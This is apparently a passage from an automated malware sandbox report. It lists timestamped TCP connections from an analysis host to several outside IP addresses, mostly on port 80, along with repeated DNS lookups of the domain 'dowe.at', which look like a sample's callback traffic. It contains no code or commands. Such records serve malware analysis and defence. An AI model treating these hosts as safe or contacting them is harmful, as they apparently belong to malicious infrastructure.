                                                            Nov 30, 2022 00:11:39.513082027 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.513456106 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.513570070 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.513592005 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.513844967 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.513942957 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.513962984 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.514476061 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.514576912 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.514600992 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.514648914 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.514738083 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.514748096 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.514760971 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.514832020 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.514852047 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.515136957 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.515175104 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.515202045 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.515216112 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:39.515228033 CET49739443192.168.2.65.135.247.111
                                                            Nov 30, 2022 00:11:39.515234947 CET443497395.135.247.111192.168.2.6
                                                            Nov 30, 2022 00:11:40.713931084 CET4974080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:40.902750969 CET8049740200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:40.905314922 CET4974080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:40.905594110 CET4974080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:40.905594110 CET4974080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:41.107122898 CET8049740200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:41.773041964 CET8049740200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:41.773087025 CET8049740200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:41.773272038 CET4974080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:41.773272038 CET4974080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:41.825273991 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:41.960243940 CET8049740200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:42.015269995 CET8049741200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:42.015568972 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:42.015697002 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:42.015731096 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:42.219470024 CET8049741200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:42.917011976 CET8049741200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:42.917027950 CET8049741200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:42.917191029 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:42.917234898 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:42.971725941 CET4974280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:43.261981964 CET8049742211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:43.262186050 CET4974280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:43.262384892 CET4974280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:43.262415886 CET4974280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:43.467472076 CET8049741200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:43.467571020 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:43.492845058 CET4974180192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:43.550381899 CET8049742211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:43.687269926 CET8049741200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:44.508891106 CET8049742211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:44.508941889 CET8049742211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:44.509038925 CET4974280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:44.509095907 CET4974280192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:44.555799961 CET4974380192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:44.772744894 CET8049743201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:44.772866964 CET4974380192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:44.773011923 CET4974380192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:44.773050070 CET4974380192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:44.797210932 CET8049742211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:44.998838902 CET8049743201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:45.499025106 CET8049743201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:45.499041080 CET8049743201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:45.499150038 CET4974380192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:45.499269009 CET4974380192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:45.689557076 CET4974480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:45.714860916 CET8049743201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:45.906763077 CET8049744201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:45.907126904 CET4974480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:45.929184914 CET4974480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:45.929186106 CET4974480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:46.146399975 CET8049744201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:46.882761955 CET8049744201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:46.882782936 CET8049744201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:46.882980108 CET4974480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:47.050429106 CET4974480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:47.145308018 CET4974580192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:47.266868114 CET8049744201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:47.433871984 CET8049745211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:47.434117079 CET4974580192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:47.440696001 CET4974580192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:47.441612005 CET4974580192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:47.731230974 CET8049745211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:48.657201052 CET8049745211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:48.657246113 CET8049745211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:48.657413960 CET4974580192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:48.658500910 CET4974580192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:48.946954012 CET8049745211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:48.992398977 CET4974680192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:49.209975004 CET8049746201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:49.210124969 CET4974680192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:49.210225105 CET4974680192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:49.210750103 CET4974680192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:49.426552057 CET8049746201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:50.163073063 CET8049746201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:50.163120985 CET8049746201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:50.163295031 CET4974680192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:50.163295031 CET4974680192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:50.205298901 CET4974780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:50.378834009 CET8049746201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:50.394006968 CET8049747200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:50.394140005 CET4974780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:50.394320965 CET4974780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:50.394320965 CET4974780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:50.587718010 CET8049747200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:51.255007029 CET8049747200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:51.255044937 CET8049747200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:51.255191088 CET4974780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:51.255285978 CET4974780192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:51.392366886 CET4974880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:51.453155041 CET8049747200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:51.611269951 CET8049748201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:51.611440897 CET4974880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:51.611656904 CET4974880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:51.611707926 CET4974880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:51.842133045 CET8049748201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:52.585900068 CET8049748201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:52.585918903 CET8049748201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:52.586046934 CET4974880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:52.592808008 CET4974880192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:52.631943941 CET4974980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:52.810503006 CET8049748201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:52.819721937 CET8049749200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:52.820056915 CET4974980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:52.820238113 CET4974980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:52.820238113 CET4974980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:53.008965969 CET8049749200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:53.679073095 CET8049749200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:53.679116964 CET8049749200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:53.679306984 CET4974980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:53.680666924 CET4974980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:53.781126022 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:53.866978884 CET8049749200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:54.072396994 CET8049750211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:54.072655916 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:54.077814102 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:54.078459024 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:54.369577885 CET8049750211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:55.285368919 CET8049750211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:55.285408974 CET8049750211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:55.285557985 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:55.285643101 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:55.366971970 CET4975180192.168.2.6187.212.179.75
                                                            Nov 30, 2022 00:11:55.546691895 CET8049751187.212.179.75192.168.2.6
                                                            Nov 30, 2022 00:11:55.546917915 CET4975180192.168.2.6187.212.179.75
                                                            Nov 30, 2022 00:11:55.566342115 CET4975180192.168.2.6187.212.179.75
                                                            Nov 30, 2022 00:11:55.566395998 CET4975180192.168.2.6187.212.179.75
                                                            Nov 30, 2022 00:11:55.742954016 CET8049751187.212.179.75192.168.2.6
                                                            Nov 30, 2022 00:11:56.181432962 CET4975080192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:56.352952957 CET8049751187.212.179.75192.168.2.6
                                                            Nov 30, 2022 00:11:56.352973938 CET8049751187.212.179.75192.168.2.6
                                                            Nov 30, 2022 00:11:56.353133917 CET4975180192.168.2.6187.212.179.75
                                                            Nov 30, 2022 00:11:56.353133917 CET4975180192.168.2.6187.212.179.75
                                                            Nov 30, 2022 00:11:56.404964924 CET4975380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:56.472306013 CET8049750211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:56.533855915 CET8049751187.212.179.75192.168.2.6
                                                            Nov 30, 2022 00:11:56.600492954 CET8049753200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:56.600626945 CET4975380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:56.600760937 CET4975380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:56.600780010 CET4975380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:56.810672045 CET8049753200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:57.485692978 CET8049753200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:57.485722065 CET8049753200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:57.485822916 CET4975380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:57.485913038 CET4975380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:57.682812929 CET8049753200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:58.054320097 CET4975480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:58.278635979 CET8049754201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:58.278934002 CET4975480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:58.278934956 CET4975480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:58.280477047 CET4975480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:58.504642010 CET8049754201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:59.230812073 CET8049754201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:59.230830908 CET8049754201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:59.231146097 CET4975480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:59.231146097 CET4975480192.168.2.6201.124.230.1
                                                            Nov 30, 2022 00:11:59.322518110 CET4975580192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:59.453202009 CET8049754201.124.230.1192.168.2.6
                                                            Nov 30, 2022 00:11:59.500096083 CET8049755200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:59.500320911 CET4975580192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:59.500617027 CET4975580192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:59.500617027 CET4975580192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:59.689419031 CET8049755200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:00.352895975 CET8049755200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:00.353825092 CET4975580192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:00.359714985 CET8049755200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:00.360199928 CET4975580192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:00.431853056 CET4975680192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:00.534799099 CET8049755200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:00.624418020 CET8049756200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:00.624742031 CET4975680192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:00.624742031 CET4975680192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:00.626914978 CET4975680192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:00.827110052 CET8049756200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:01.500219107 CET8049756200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:01.500246048 CET8049756200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:01.500386000 CET4975680192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:01.500478983 CET4975680192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:01.543417931 CET4975780192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:01.692732096 CET8049756200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:01.833837986 CET8049757211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:01.834028959 CET4975780192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:01.834208965 CET4975780192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:01.834239006 CET4975780192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:02.126087904 CET8049757211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:03.457660913 CET8049757211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:03.457700014 CET8049757211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:03.457832098 CET4975780192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:03.457942963 CET4975780192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:03.498950958 CET4975880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:03.749648094 CET8049757211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:03.782459021 CET8049758211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:03.782593012 CET4975880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:03.782768965 CET4975880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:03.782977104 CET4975880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:04.073066950 CET8049758211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:04.990518093 CET8049758211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:04.990545988 CET8049758211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:04.990923882 CET4975880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:05.020685911 CET4975880192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:05.266185045 CET4975980192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:05.304953098 CET8049758211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:05.557368040 CET8049759211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:05.557610989 CET4975980192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:06.007128954 CET4975980192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:06.007268906 CET4975980192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:06.297910929 CET8049759211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:07.220952988 CET8049759211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:07.220992088 CET8049759211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:07.221159935 CET4975980192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:07.735435009 CET4975980192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:12:07.954555035 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:08.025975943 CET8049759211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:12:08.150751114 CET8049760200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:08.151019096 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:08.152627945 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:08.152676105 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:08.341430902 CET8049760200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:09.011964083 CET8049760200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:09.011971951 CET8049760200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:09.012087107 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:09.018203020 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:09.635799885 CET4976080192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:12:09.822771072 CET8049760200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:12:19.834485054 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:12:19.836880922 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:12:19.837188959 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:12:20.108251095 CET8049725123.253.32.170192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 30, 2022 00:10:57.539028883 CET6291053192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:10:58.022703886 CET53629108.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:10:59.104090929 CET6386353192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:10:59.585829020 CET53638638.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:01.073633909 CET6253853192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:01.562983036 CET53625388.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:03.599140882 CET5490353192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:03.619827986 CET53549038.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:04.708935022 CET5153053192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:04.729224920 CET53515308.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:20.956633091 CET6160953192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:20.978972912 CET53616098.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:22.561232090 CET5248153192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:22.578528881 CET53524818.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:23.650019884 CET5394353192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:24.170435905 CET53539438.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:25.679337978 CET5608653192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:25.698915958 CET53560868.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:27.249752998 CET5654753192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:27.268702984 CET53565478.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:29.865735054 CET5988153192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:29.909164906 CET53598818.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:34.537358999 CET5891753192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:34.555744886 CET53589178.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:35.817455053 CET6252053192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:35.837424994 CET53625208.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:37.053144932 CET5562953192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:37.070822954 CET53556298.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:38.141012907 CET5207953192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:38.159097910 CET53520798.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:39.139863968 CET5656953192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:39.178725958 CET53565698.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:40.692821026 CET6183353192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:40.713022947 CET53618338.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:41.800481081 CET6504453192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:41.821110964 CET53650448.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:42.937369108 CET6003253192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:42.970715046 CET53600328.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:44.522392035 CET4923253192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:44.541811943 CET53492328.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:45.507319927 CET5612353192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:45.526927948 CET53561238.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:47.124767065 CET5975253192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:47.144521952 CET53597528.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:48.973812103 CET5286553192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:48.991724968 CET53528658.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:50.177469969 CET5732253192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:50.196737051 CET53573228.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:51.373785019 CET6295853192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:51.391386986 CET53629588.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:52.608006954 CET6440453192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:52.630928993 CET53644048.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:53.755806923 CET6284853192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:53.780193090 CET53628488.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:55.344466925 CET5595653192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:55.366202116 CET53559568.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:56.383055925 CET5132153192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:56.403703928 CET53513218.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:57.562014103 CET6108953192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:58.053072929 CET53610898.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:11:59.303905010 CET6276653192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:11:59.321430922 CET53627668.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:12:00.410181999 CET6013053192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:12:00.430341005 CET53601308.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:12:01.524296045 CET6273253192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:12:01.541763067 CET53627328.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:12:03.480338097 CET6069053192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:12:03.497956991 CET53606908.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:12:05.245548010 CET5675053192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:12:05.265032053 CET53567508.8.8.8192.168.2.6
                                                            Nov 30, 2022 00:12:07.934282064 CET5933653192.168.2.68.8.8.8
                                                            Nov 30, 2022 00:12:07.953203917 CET53593368.8.8.8192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 30, 2022 00:10:57.539028883 CET192.168.2.68.8.8.80x8dc7Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.104090929 CET192.168.2.68.8.8.80x7cfcStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.073633909 CET192.168.2.68.8.8.80xec19Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.599140882 CET192.168.2.68.8.8.80x2110Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.708935022 CET192.168.2.68.8.8.80x4552Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.956633091 CET192.168.2.68.8.8.80xf6bfStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.561232090 CET192.168.2.68.8.8.80x12a6Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:23.650019884 CET192.168.2.68.8.8.80xec6cStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.679337978 CET192.168.2.68.8.8.80xc21bStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.249752998 CET192.168.2.68.8.8.80xe317Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.865735054 CET192.168.2.68.8.8.80xf2fcStandard query (0)dowe.atA (IP address)IN (0x0001)false
